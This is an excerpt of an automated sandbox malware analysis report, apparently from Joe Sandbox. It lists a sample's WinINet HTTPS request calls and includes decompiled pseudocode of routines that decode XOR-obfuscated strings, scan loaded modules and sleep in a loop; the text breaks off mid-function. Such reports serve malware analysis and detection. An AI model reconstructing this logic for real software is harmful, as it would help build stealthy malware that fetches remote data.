0x003bccb8
0x003bccbb
0x003bccbe
0x003bccc3
0x003bccc5
0x003bccc5
0x003bccc7
0x003bccd3
0x003bccd8
0x003bccdc
0x003bccdf
0x003bccdf
0x003bcd20
0x00000000
0x00000000
0x00000000
0x00000000
0x003bcd20
0x00000000

APIs

memset.VCRUNTIME140(?,00000000,00000400,4B5EE95B,00000000,?), ref: 003BCAA5
memset.VCRUNTIME140(?,00000000,00000400,00000000,?), ref: 003BCB18
InternetOpenA.WININET(003C145D,00000000,00000000,00000000,00000000), ref: 003BCB2D
InternetConnectA.WININET(00000000,?,000001BB,00000000,00000000,00000003,00000000,00000001), ref: 003BCBA1
HttpOpenRequestA.WININET(00000000,?,?,00000000,00000000,00000000,84800000,00000001), ref: 003BCC0C
HttpSendRequestA.WININET(00000000,?,?,?,?), ref: 003BCC5C

Part of subcall function 003B51D0: memmove.VCRUNTIME140(006F5B9C,?,?), ref: 003B51FD

InternetReadFile.WININET(00000000,?,000003FF,00000000), ref: 003BCC8C
memmove.VCRUNTIME140(00000000,?,00000000,?,?,?,00000000,?), ref: 003BCCD3
InternetReadFile.WININET(00000000,?,000003FF,00000000), ref: 003BCD18
InternetCloseHandle.WININET(00000000), ref: 003BCD2D
InternetCloseHandle.WININET(?), ref: 003BCD35
InternetCloseHandle.WININET(?), ref: 003BCD3D
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000000,?), ref: 003BCD6B

Strings

[^K/, xrefs: 003BCA77

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$FileHttpOpenReadRequestmemmovememset$ConnectSend_invalid_parameter_noinfo_noreturn
String ID: [^K/
API String ID: 3373393435-4166871755
Opcode ID: a82f4d75cf65918b32ff10c1fbf5c07b84ecaf0ef520aaaf36b92b9b7c370ed9
Instruction ID: 4ca5196168bad034d88d79fc748644d1157858beab2113e5060fa0e984f9557d
Opcode Fuzzy Hash: a82f4d75cf65918b32ff10c1fbf5c07b84ecaf0ef520aaaf36b92b9b7c370ed9
Instruction Fuzzy Hash: 989139359002189EDB228F28CC41BE9BBB8FF45704F1491E9EA48AB141DB70AB85CF94

Uniqueness

Uniqueness Score: -1.00%

Function 003B6F80 Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 414
processsleepCOMMONCrypto

Download Yara Rule

C-Code - Quality: 67%

			E003B6F80(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi) {
				signed int _v8;
				char _v16;
				signed int _v20;
				char _v21;
				char _v22;
				signed int _v28;
				signed int _v32;
				char _v556;
				intOrPtr _v564;
				void* _v568;
				void* _v588;
				signed int _v589;
				signed int _v590;
				char _v593;
				signed int _v594;
				signed char _v595;
				signed char _v596;
				signed char _v597;
				signed char _v598;
				signed int _v599;
				signed char _v600;
				signed char _v601;
				signed char _v602;
				signed char _v603;
				signed int _v604;
				void* _v608;
				void* _v612;
				intOrPtr _v616;
				intOrPtr _v620;
				signed int _v624;
				void* _v640;
				intOrPtr _v644;
				signed int _t133;
				signed int _t134;
				signed char _t143;
				intOrPtr _t144;
				void* _t147;
				intOrPtr _t148;
				signed int _t156;
				signed int _t157;
				void* _t160;
				signed int _t161;
				intOrPtr _t163;
				signed int _t167;
				intOrPtr _t168;
				signed int _t170;
				signed int _t176;
				signed int _t177;
				signed int _t178;
				signed int _t180;
				signed int _t185;
				intOrPtr _t189;
				intOrPtr _t195;
				signed int _t197;
				signed int _t198;
				signed char _t206;
				void* _t207;
				signed char _t211;
				intOrPtr _t213;
				intOrPtr _t214;
				signed char _t219;
				signed char _t220;
				intOrPtr* _t221;
				signed char _t227;
				signed char _t228;
				intOrPtr* _t229;
				char _t239;
				void* _t242;
				void* _t243;
				intOrPtr* _t245;
				void* _t246;
				void* _t247;
				signed char _t256;
				void* _t257;
				void* _t258;
				signed char _t262;
				void* _t263;
				intOrPtr* _t265;
				void* _t266;
				intOrPtr* _t267;
				int _t269;
				void* _t270;
				signed int _t274;
				signed int _t278;
				void* _t279;
				intOrPtr* _t281;
				void* _t282;
				signed int _t283;
				void* _t284;
				void* _t285;
				void* _t306;

				_push(0xffffffff);
				_push(E003BF94B);
				_push( *[fs:0x0]);
				_t285 = _t284 - 0x274;
				_t133 =  *0x3c500c; // 0x4b5ee95b
				_t134 = _t133 ^ _t283;
				_v20 = _t134;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t134);
				 *[fs:0x0] =  &_v16;
				_t269 = __edx;
				_v612 = __edx;
				_v644 = __ecx;
				_t278 = CloseHandle;
				asm("o16 nop [eax+eax]");
				while(1) {
					_v604 = 0x36;
					_v589 = 0x5a;
					_v590 = 0x5a;
					_v603 = 0x00000055 ^ _v604;
					_v602 = 0x00000042 ^ _v604;
					_t219 = _v604;
					_v593 = 0;
					_v595 = 0x00000058 ^ _t219;
					_t220 = _t219 ^ _t219;
					_t256 = 0x00000018 ^ _t219 ^ _t220;
					_v598 = _t220;
					_v601 = _t256;
					_v597 = _t256;
					_t206 = 0x00000052 ^ _t220 ^ _t220;
					_v600 = _t206;
					_t143 = _v590 ^ _t220 ^ _t220;
					_v599 = _t143;
					_t221 =  &_v603;
					_v596 = _t206;
					_v594 = _t143;
					_t257 = _t221 + 1;
					_v593 = 0;
					_v624 = 0;
					_v620 = 0xf;
					_v640 = 0;
					do {
						_t144 =  *_t221;
						_t221 = _t221 + 1;
					} while (_t144 != 0);
					_push(_t221 - _t257);
					E003B51D0( &_v640, _t257,  &_v603);
					_t147 = CreateToolhelp32Snapshot(8, _t269);
					_t258 = _v640;
					_t270 = _t147;
					_v608 = _t270;
					_v616 = _t258;
					if(_t270 == 0xffffffff) {
						L28:
						_t207 = 0;
					} else {
						_v588 = 0x224;
						if(Module32First(_t270,  &_v588) == 0) {
							L27:
							CloseHandle(_t270);
							_t258 = _v616;
							goto L28;
						} else {
							_t214 = _v624;
							do {
								_t281 =  &_v556;
								_t247 = _t281 + 1;
								do {
									_t195 =  *_t281;
									_t281 = _t281 + 1;
								} while (_t195 != 0);
								_t282 = _t281 - _t247;
								_t267 =  &_v556;
								_t197 =  >=  ? _v616 :  &_v640;
								_t276 =  <  ? _t282 : _t214;
								_t270 = ( <  ? _t282 : _t214) - 4;
								if(_t270 < 0) {
									L12:
									if(_t270 == 0xfffffffc) {
										goto L21;
									} else {
										goto L13;
									}
								} else {
									while( *_t197 ==  *_t267) {
										_t197 = _t197 + 4;
										_t267 = _t267 + 4;
										_t270 = _t270 - 4;
										if(_t270 >= 0) {
											continue;
										} else {
											goto L12;
										}
										goto L22;
									}
									L13:
									if( *_t197 !=  *_t267) {
										L20:
										asm("sbb eax, eax");
										_t198 = _t197 | 0x00000001;
									} else {
										if(_t270 == 0xfffffffd) {
											L21:
											_t198 = 0;
											__eflags = 0;
										} else {
											if( *((intOrPtr*)(_t197 + 1)) !=  *((intOrPtr*)(_t267 + 1))) {
												goto L20;
											} else {
												if(_t270 == 0xfffffffe) {
													goto L21;
												} else {
													if( *((intOrPtr*)(_t197 + 2)) !=  *((intOrPtr*)(_t267 + 2))) {
														goto L20;
													} else {
														if(_t270 == 0xffffffff) {
															goto L21;
														} else {
															_t197 =  *((intOrPtr*)(_t197 + 3));
															if(_t197 ==  *((intOrPtr*)(_t267 + 3))) {
																goto L21;
															} else {
																goto L20;
															}
														}
													}
												}
											}
										}
									}
								}
								L22:
								if(_t198 != 0) {
									goto L25;
								} else {
									_t306 = _t214 - _t282;
									if(_t306 < 0 || _t306 > 0) {
										goto L25;
									} else {
										_t278 = CloseHandle;
										CloseHandle(_v608);
										_t207 = _v568;
										_t258 = _v616;
									}
								}
								goto L29;
								L25:
								_t270 = _v608;
							} while (Module32Next(_t270,  &_v588) != 0);
							_t278 = CloseHandle;
							goto L27;
						}
					}
					L29:
					_t148 = _v620;
					_v608 = _t207;
					if(_t148 < 0x10) {
						L33:
						if(_t207 != 0) {
							_v604 = 5;
							_v590 = 0x69;
							_v589 = 0x69;
							_v603 = 0x00000066 ^ _v604;
							_v602 = 0x00000071 ^ _v604;
							_t227 = _v604;
							_v593 = 0;
							_v595 = 0x0000006b ^ _t227;
							_t228 = _t227 ^ _t227;
							_t262 = 0x0000002b ^ _t227 ^ _t228;
							_v598 = _t228;
							_v601 = _t262;
							_v597 = _t262;
							_t211 = 0x00000061 ^ _t228 ^ _t228;
							_v600 = _t211;
							_t156 = _v589 ^ _t228 ^ _t228;
							__eflags = _t156;
							_v599 = _t156;
							_t229 =  &_v603;
							_v596 = _t211;
							_v594 = _t156;
							_t263 = _t229 + 1;
							_v593 = 0;
							_v624 = 0;
							_v620 = 0xf;
							_v640 = 0;
							do {
								_t157 =  *_t229;
								_t229 = _t229 + 1;
								__eflags = _t157;
							} while (_t157 != 0);
							_push(_t229 - _t263);
							E003B51D0( &_v640, _t263,  &_v603);
							_v8 = 0;
							_t160 = CreateToolhelp32Snapshot(8, _v612);
							_t270 = _v640;
							_t279 = _t160;
							_v612 = _t279;
							__eflags = _t279 - 0xffffffff;
							if(_t279 == 0xffffffff) {
								L65:
								_t161 = 0;
								__eflags = 0;
							} else {
								_v588 = 0x224;
								_t176 = Module32First(_t279,  &_v588);
								__eflags = _t176;
								if(_t176 != 0) {
									_t213 = _v624;
									while(1) {
										_t265 =  &_v556;
										_t243 = _t265 + 1;
										do {
											_t177 =  *_t265;
											_t265 = _t265 + 1;
											__eflags = _t177;
										} while (_t177 != 0);
										_t266 = _t265 - _t243;
										_t279 =  &_v556;
										__eflags = _v620 - 0x10;
										_t245 =  >=  ? _t270 :  &_v640;
										__eflags = _t266 - _t213;
										_t273 =  <  ? _t266 : _t213;
										_t274 = ( <  ? _t266 : _t213) - 4;
										__eflags = _t274;
										if(_t274 < 0) {
											L48:
											__eflags = _t274 - 0xfffffffc;
											if(_t274 == 0xfffffffc) {
												goto L57;
											} else {
												goto L49;
											}
										} else {
											while(1) {
												__eflags =  *_t245 -  *_t279;
												if( *_t245 !=  *_t279) {
													break;
												}
												_t245 = _t245 + 4;
												_t279 = _t279 + 4;
												_t274 = _t274 - 4;
												__eflags = _t274;
												if(_t274 >= 0) {
													continue;
												} else {
													goto L48;
												}
												goto L58;
											}
											L49:
											_t185 =  *_t245;
											__eflags = _t185 -  *_t279;
											if(_t185 !=  *_t279) {
												L56:
												asm("sbb eax, eax");
												_t178 = _t185 | 0x00000001;
											} else {
												__eflags = _t274 - 0xfffffffd;
												if(_t274 == 0xfffffffd) {
													L57:
													_t178 = 0;
													__eflags = 0;
												} else {
													_t185 =  *((intOrPtr*)(_t245 + 1));
													__eflags = _t185 -  *((intOrPtr*)(_t279 + 1));
													if(_t185 !=  *((intOrPtr*)(_t279 + 1))) {
														goto L56;
													} else {
														__eflags = _t274 - 0xfffffffe;
														if(_t274 == 0xfffffffe) {
															goto L57;
														} else {
															_t185 =  *((intOrPtr*)(_t245 + 2));
															__eflags = _t185 -  *((intOrPtr*)(_t279 + 2));
															if(_t185 !=  *((intOrPtr*)(_t279 + 2))) {
																goto L56;
															} else {
																__eflags = _t274 - 0xffffffff;
																if(_t274 == 0xffffffff) {
																	goto L57;
																} else {
																	_t185 =  *((intOrPtr*)(_t245 + 3));
																	__eflags = _t185 -  *((intOrPtr*)(_t279 + 3));
																	if(_t185 ==  *((intOrPtr*)(_t279 + 3))) {
																		goto L57;
																	} else {
																		goto L56;
																	}
																}
															}
														}
													}
												}
											}
										}
										L58:
										__eflags = _t178;
										if(_t178 != 0) {
											L61:
											_t279 = _v612;
											_t180 = Module32Next(_t279,  &_v588);
											__eflags = _t180;
											if(_t180 == 0) {
												CloseHandle(_t279);
												_t270 = _v640;
												goto L65;
											} else {
												_t270 = _v640;
												continue;
											}
										} else {
											__eflags = _t213 - _t266;
											if(__eflags < 0 || __eflags > 0) {
												goto L61;
											} else {
												CloseHandle(_v612);
												_t161 = _v564;
												_t270 = _v640;
											}
										}
										goto L66;
									}
								} else {
									CloseHandle(_t279);
									goto L65;
								}
							}
							L66:
							_t207 = _v644;
							_t278 = E003B6B60(_t207, _t207, _v608, _t270, _t279, _t161);
							_v8 = 0xffffffff;
							_t163 = _v620;
							_t285 = _t285 + 4;
							__eflags = _t163 - 0x10;
							if(_t163 >= 0x10) {
								_t117 = _t163 + 1; // 0x11
								_t242 = _t117;
								_t172 = _t270;
								__eflags = _t242 - 0x1000;
								if(_t242 >= 0x1000) {
									_t270 =  *(_t270 - 4);
									_t242 = _t242 + 0x23;
									_t172 = _t172 - _t270 + 0xfffffffc;
									__eflags = _t172 - 0x1f;
									if(_t172 > 0x1f) {
										goto L69;
									}
								}
								goto L70;
							}
						} else {
							Sleep(0x3e8);
							_t269 = _v612;
							continue;
						}
					} else {
						_t55 = _t148 + 1; // 0x10
						_t246 = _t55;
						_t189 = _t258;
						if(_t246 < 0x1000) {
							L32:
							_push(_t246);
							E003BE78C(_t189, _t258);
							_t285 = _t285 + 8;
							goto L33;
						} else {
							_t258 =  *((intOrPtr*)(_t258 - 4));
							_t242 = _t246 + 0x23;
							_t172 = _t189 - _t258 + 0xfffffffc;
							if(_t189 - _t258 + 0xfffffffc > 0x1f) {
								L69:
								__imp___invalid_parameter_noinfo_noreturn();
								L70:
								_push(_t242);
								E003BE78C(_t172, _t270);
							} else {
								goto L32;
							}
						}
					}
					__eflags = _t278;
					if(_t278 == 0) {
						L79:
						__eflags = 0;
					} else {
						_v21 = 0;
						_v28 = 0;
						_v32 = 0;
						_t167 =  *((intOrPtr*)( *0x6f6370))(_t207, _t278,  &_v21, 1,  &_v28);
						__eflags = _t167;
						if(_t167 == 0) {
							goto L79;
						} else {
							__eflags = _v28;
							if(_v28 == 0) {
								goto L79;
							} else {
								_t168 = _v21;
								_t239 =  *0x6f5d18; // 0x9
								__eflags = _t168 - _t239;
								if(_t168 != _t239) {
									__eflags = _t168 - 2;
									if(_t168 != 2) {
										goto L79;
									} else {
										_v22 = _t239;
										_t170 =  *((intOrPtr*)( *0x6f6384))(_t207, _t278,  &_v22, 1,  &_v32);
										__eflags = _t170;
										if(_t170 == 0) {
											goto L79;
										} else {
											__eflags = _v32;
											if(_v32 != 0) {
												goto L75;
											} else {
												goto L79;
											}
										}
									}
								} else {
									L75:
								}
							}
						}
					}
					 *[fs:0x0] = _v16;
					__eflags = _v20 ^ _t283;
					return E003BE3D0(_v20 ^ _t283);
				}
			}

0x003b6f83
0x003b6f85
0x003b6f90
0x003b6f91
0x003b6f97
0x003b6f9c
0x003b6f9e
0x003b6fa1
0x003b6fa2
0x003b6fa3
0x003b6fa4
0x003b6fa8
0x003b6fae
0x003b6fb0
0x003b6fb6
0x003b6fbc
0x003b6fc6
0x003b6fd0
0x003b6fd2
0x003b6fd9
0x003b6fe9
0x003b6ff9
0x003b7009
0x003b7011
0x003b7019
0x003b7022
0x003b702e
0x003b7030
0x003b7032
0x003b703a
0x003b7042
0x003b7048
0x003b704a
0x003b7050
0x003b7052
0x003b7058
0x003b705e
0x003b7064
0x003b706a
0x003b706d
0x003b7074
0x003b707e
0x003b7088
0x003b7090
0x003b7090
0x003b7092
0x003b7093
0x003b709f
0x003b70a7
0x003b70af
0x003b70b5
0x003b70bb
0x003b70bd
0x003b70c3
0x003b70cc
0x003b71c5
0x003b71c5
0x003b70d2
0x003b70d8
0x003b70ec
0x003b71bc
0x003b71bd
0x003b71bf
0x00000000
0x003b70f2
0x003b70f2
0x003b7100
0x003b7100
0x003b7106
0x003b7110
0x003b7110
0x003b7112
0x003b7113
0x003b7117
0x003b7126
0x003b712e
0x003b7137
0x003b713a
0x003b713d
0x003b7151
0x003b7154
0x00000000
0x00000000
0x00000000
0x00000000
0x003b7140
0x003b7140
0x003b7146
0x003b7149
0x003b714c
0x003b714f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003b714f
0x003b7156
0x003b715a
0x003b7183
0x003b7183
0x003b7185
0x003b715c
0x003b715f
0x003b718a
0x003b718a
0x003b718a
0x003b7161
0x003b7167
0x00000000
0x003b7169
0x003b716c
0x00000000
0x003b716e
0x003b7174
0x00000000
0x003b7176
0x003b7179
0x00000000
0x003b717b
0x003b717b
0x003b7181
0x00000000
0x00000000
0x00000000
0x00000000
0x003b7181
0x003b7179
0x003b7174
0x003b716c
0x003b7167
0x003b715f
0x003b715a
0x003b718c
0x003b718e
0x00000000
0x003b7190
0x003b7190
0x003b7192
0x00000000
0x003b721d
0x003b7223
0x003b7229
0x003b722b
0x003b7231
0x003b7231
0x003b7192
0x00000000
0x003b719a
0x003b719a
0x003b71ae
0x003b71b6
0x00000000
0x003b71b6
0x003b70ec
0x003b71c7
0x003b71c7
0x003b71cd
0x003b71d6
0x003b7203
0x003b7205
0x003b723b
0x003b7242
0x003b7252
0x003b7262
0x003b7272
0x003b727a
0x003b7282
0x003b728b
0x003b7297
0x003b7299
0x003b729b
0x003b72a3
0x003b72ab
0x003b72b1
0x003b72b3
0x003b72b9
0x003b72b9
0x003b72bb
0x003b72c1
0x003b72c7
0x003b72cd
0x003b72d3
0x003b72d6
0x003b72dd
0x003b72e7
0x003b72f1
0x003b72f8
0x003b72f8
0x003b72fa
0x003b72fb
0x003b72fb
0x003b7307
0x003b730f
0x003b731a
0x003b7323
0x003b7329
0x003b732f
0x003b7331
0x003b7337
0x003b733a
0x003b7452
0x003b7452
0x003b7452
0x003b7340
0x003b7346
0x003b7352
0x003b7358
0x003b735a
0x003b7369
0x003b7370
0x003b7370
0x003b7376
0x003b7380
0x003b7380
0x003b7382
0x003b7383
0x003b7383
0x003b7387
0x003b7389
0x003b738f
0x003b739c
0x003b739f
0x003b73a3
0x003b73a6
0x003b73a6
0x003b73a9
0x003b73c1
0x003b73c1
0x003b73c4
0x00000000
0x00000000
0x00000000
0x00000000
0x003b73b0
0x003b73b0
0x003b73b2
0x003b73b4
0x00000000
0x00000000
0x003b73b6
0x003b73b9
0x003b73bc
0x003b73bc
0x003b73bf
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003b73bf
0x003b73c6
0x003b73c6
0x003b73c8
0x003b73ca
0x003b73f3
0x003b73f3
0x003b73f5
0x003b73cc
0x003b73cc
0x003b73cf
0x003b73fa
0x003b73fa
0x003b73fa
0x003b73d1
0x003b73d1
0x003b73d4
0x003b73d7
0x00000000
0x003b73d9
0x003b73d9
0x003b73dc
0x00000000
0x003b73de
0x003b73de
0x003b73e1
0x003b73e4
0x00000000
0x003b73e6
0x003b73e6
0x003b73e9
0x00000000
0x003b73eb
0x003b73eb
0x003b73ee
0x003b73f1
0x00000000
0x00000000
0x00000000
0x00000000
0x003b73f1
0x003b73e9
0x003b73e4
0x003b73dc
0x003b73d7
0x003b73cf
0x003b73ca
0x003b73fc
0x003b73fc
0x003b73fe
0x003b7406
0x003b7406
0x003b7414
0x003b741a
0x003b741c
0x003b744a
0x003b744c
0x00000000
0x003b741e
0x003b741e
0x00000000
0x003b741e
0x003b7400
0x003b7400
0x003b7402
0x00000000
0x003b7429
0x003b7434
0x003b7436
0x003b743c
0x003b743c
0x003b7402
0x00000000
0x003b73fe
0x003b735c
0x003b7362
0x00000000
0x003b7362
0x003b735a
0x003b7454
0x003b7454
0x003b7468
0x003b746a
0x003b7471
0x003b7477
0x003b747a
0x003b747d
0x003b747f
0x003b747f
0x003b7482
0x003b7484
0x003b748a
0x003b748c
0x003b748f
0x003b7494
0x003b7497
0x003b749a
0x00000000
0x00000000
0x003b749a
0x00000000
0x003b748a
0x003b7207
0x003b720c
0x003b7212
0x00000000
0x003b7212
0x003b71d8
0x003b71d8
0x003b71d8
0x003b71db
0x003b71e3
0x003b71f9
0x003b71f9
0x003b71fb
0x003b7200
0x00000000
0x003b71e5
0x003b71e5
0x003b71e8
0x003b71ed
0x003b71f3
0x003b749c
0x003b749c
0x003b74a2
0x003b74a2
0x003b74a4
0x00000000
0x00000000
0x00000000
0x003b71f3
0x003b71e3
0x003b74ac
0x003b74ae
0x003b7514
0x003b7514
0x003b74b0
0x003b74be
0x003b74c5
0x003b74cc
0x003b74d3
0x003b74d5
0x003b74d7
0x00000000
0x003b74d9
0x003b74d9
0x003b74dd
0x00000000
0x003b74df
0x003b74df
0x003b74e2
0x003b74e8
0x003b74ea
0x003b74f0
0x003b74f2
0x00000000
0x003b74f4
0x003b74f9
0x003b7508
0x003b750a
0x003b750c
0x00000000
0x003b750e
0x003b750e
0x003b7512
0x00000000
0x00000000
0x00000000
0x00000000
0x003b7512
0x003b750c
0x003b74ec
0x003b74ec
0x003b74ec
0x003b74ea
0x003b74dd
0x003b74d7
0x003b7519
0x003b7527
0x003b7531
0x003b7531

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 003B70AF
Module32First.KERNEL32 ref: 003B70E4
Module32Next.KERNEL32 ref: 003B71A8
CloseHandle.KERNEL32(00000000), ref: 003B71BD
Sleep.KERNEL32(000003E8), ref: 003B720C
CloseHandle.KERNEL32(?), ref: 003B7229
CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 003B7323
Module32First.KERNEL32 ref: 003B7352
Module32Next.KERNEL32 ref: 003B7414
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000064), ref: 003B749C

Strings

6, xrefs: 003B6FD2
[^K/, xrefs: 003B6F97

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID: Module32$CloseCreateFirstHandleNextSnapshotToolhelp32$Sleep_invalid_parameter_noinfo_noreturn
String ID: 6$[^K/
API String ID: 57408744-2737796335
Opcode ID: a07571444ff23c9da57bb4d021f15dd57eabd2d1d7f05eef38868690a57bdba5
Instruction ID: 099c0b71c83f9653e519dd5f1fbc1ef1333acaeb73dfbb118996f16eaad28e7e
Opcode Fuzzy Hash: a07571444ff23c9da57bb4d021f15dd57eabd2d1d7f05eef38868690a57bdba5
Instruction Fuzzy Hash: 76F10A319082A88FCF228B38CC587EEBB75EB96314F1542D8C55D67692D7315E8ACF60

Uniqueness

Uniqueness Score: -1.00%

Function 003BCDA0 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 39%

			E003BCDA0(void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				int _v16;
				char _v24;
				signed int _v32;
				int _v36;
				int _v40;
				char _v56;
				int _v60;
				int _v64;
				char _v80;
				intOrPtr _v84;
				char _v104;
				char _v280;
				void _v284;
				char _v285;
				char _v290;
				char _v291;
				char _v292;
				char _v295;
				char _v296;
				char _v297;
				char _v298;
				char _v299;
				char _v300;
				char _v301;
				intOrPtr _v304;
				intOrPtr _v308;
				intOrPtr _v312;
				char _v324;
				char _v327;
				signed int _v328;
				int _v332;
				int _v336;
				char _v352;
				int _v356;
				int _v360;
				char _v376;
				void* __ebx;
				signed int _t129;
				signed int _t130;
				void* _t139;
				char* _t140;
				char* _t142;
				char* _t144;
				intOrPtr _t146;
				char _t149;
				void* _t160;
				intOrPtr _t164;
				intOrPtr _t167;
				intOrPtr _t170;
				intOrPtr _t177;
				intOrPtr _t180;
				intOrPtr _t183;
				void* _t186;
				void* _t197;
				char* _t198;
				void* _t200;
				intOrPtr _t210;
				char _t211;
				char _t212;
				intOrPtr _t215;
				char _t216;
				char _t217;
				int _t221;
				int _t222;
				intOrPtr _t223;
				intOrPtr* _t224;
				int _t228;
				int _t229;
				intOrPtr _t230;
				void* _t231;
				void* _t232;
				void* _t233;
				void* _t234;
				void* _t235;
				void* _t236;
				void* _t241;
				signed int _t245;
				void* _t247;
				signed int _t250;
				void* _t251;
				char* _t252;
				void* _t253;

				_t186 = _t247;
				_t250 = (_t247 - 0x00000008 & 0xfffffff8) + 4;
				_v8 =  *((intOrPtr*)(_t186 + 4));
				_t245 = _t250;
				_push(0xffffffff);
				_push(E003BFEA4);
				_push( *[fs:0x0]);
				_push(_t186);
				_t251 = _t250 - 0x160;
				_t129 =  *0x3c500c; // 0x4b5ee95b
				_t130 = _t129 ^ _t245;
				_v32 = _t130;
				_push(__esi);
				_push(__edi);
				_push(_t130);
				 *[fs:0x0] =  &_v24;
				E003BC980( &_v104, __edx);
				_v16 = 0;
				_v300 = 0x63;
				_v295 = 0;
				_v290 = 0;
				_v295 = 0;
				_v299 = 0x2e;
				_v298 = 0x65;
				_v290 = 0;
				_v292 = 0x67;
				_v297 = 0x78;
				_v296 = 0x3b;
				_v291 = 0x3b;
				_t139 = E003BC730(_t186,  &_v324, __edi, __esi);
				_v16 = 1;
				_t140 = E003B4CF0(_t139,  &_v291);
				_v360 = 0;
				_v356 = 0;
				asm("movups xmm0, [eax]");
				asm("movups [ebp-0x16c], xmm0");
				asm("movq xmm0, [eax+0x10]");
				asm("movq [ebp-0x15c], xmm0");
				 *(_t140 + 0x10) = 0;
				 *(_t140 + 0x14) = 0xf;
				 *_t140 = 0;
				_v16 = 2;
				_t142 = E003B4D60( &_v376,  &_v104);
				_v336 = 0;
				_v332 = 0;
				asm("movups xmm0, [eax]");
				asm("movups [ebp-0x154], xmm0");
				asm("movq xmm0, [eax+0x10]");
				asm("movq [ebp-0x144], xmm0");
				 *(_t142 + 0x10) = 0;
				 *(_t142 + 0x14) = 0xf;
				 *_t142 = 0;
				_v16 = 3;
				_t144 = E003B4CF0( &_v352,  &_v299);
				_v64 = 0;
				_v60 = 0;
				asm("movups xmm0, [eax]");
				asm("movups [ebp-0x44], xmm0");
				asm("movq xmm0, [eax+0x10]");
				asm("movq [ebp-0x34], xmm0");
				 *(_t144 + 0x10) = 0;
				 *(_t144 + 0x14) = 0xf;
				 *_t144 = 0;
				_v16 = 5;
				_t221 = _v332;
				if(_t221 >= 0x10) {
					_t217 = _v352;
					_t236 = _t221 + 1;
					_t183 = _t217;
					if(_t236 >= 0x1000) {
						_t217 =  *((intOrPtr*)(_t217 - 4));
						_t236 = _t236 + 0x23;
						if(_t183 > 0x1f) {
							__imp___invalid_parameter_noinfo_noreturn();
						}
					}
					_push(_t236);
					E003BE78C(_t183, _t217);
					_t251 = _t251 + 8;
				}
				_v336 = 0;
				_v332 = 0xf;
				_v352 = 0;
				_v16 = 6;
				_t222 = _v356;
				if(_t222 >= 0x10) {
					_t216 = _v376;
					_t235 = _t222 + 1;
					_t180 = _t216;
					if(_t235 >= 0x1000) {
						_t216 =  *((intOrPtr*)(_t216 - 4));
						_t235 = _t235 + 0x23;
						if(_t180 > 0x1f) {
							__imp___invalid_parameter_noinfo_noreturn();
						}
					}
					_push(_t235);
					E003BE78C(_t180, _t216);
					_t251 = _t251 + 8;
				}
				_v360 = 0;
				_v356 = 0xf;
				_v376 = 0;
				_v16 = 7;
				_t223 = _v304;
				if(_t223 >= 0x10) {
					_t215 = _v324;
					_t234 = _t223 + 1;
					_t177 = _t215;
					if(_t234 >= 0x1000) {
						_t215 =  *((intOrPtr*)(_t215 - 4));
						_t234 = _t234 + 0x23;
						if(_t177 > 0x1f) {
							__imp___invalid_parameter_noinfo_noreturn();
						}
					}
					_push(_t234);
					E003BE78C(_t177, _t215);
					_t251 = _t251 + 8;
				}
				_v40 = 0;
				_v36 = 0xf;
				_v56 = 0;
				_v16 = 8;
				_t238 =  &_v56;
				asm("movaps xmm0, [0x3c1e50]");
				_t197 = 0;
				asm("movups [ebp-0x13c], xmm0");
				_v312 = 0x7c696b61;
				_v308 = 0x26666761;
				_v304 = 0x66616a;
				do {
					 *(_t245 + _t197 - 0x13b) =  *(_t245 + _t197 - 0x13b) ^ _v328;
					_t197 = _t197 + 1;
				} while (_t197 < 0x1a);
				_t252 = _t251 - 0x18;
				_v301 = 0;
				_t198 = _t252;
				_t224 =  &_v327;
				_t241 = _t224 + 1;
				 *(_t198 + 0x10) = 0;
				 *(_t198 + 0x14) = 0xf;
				 *_t198 = 0;
				do {
					_t146 =  *_t224;
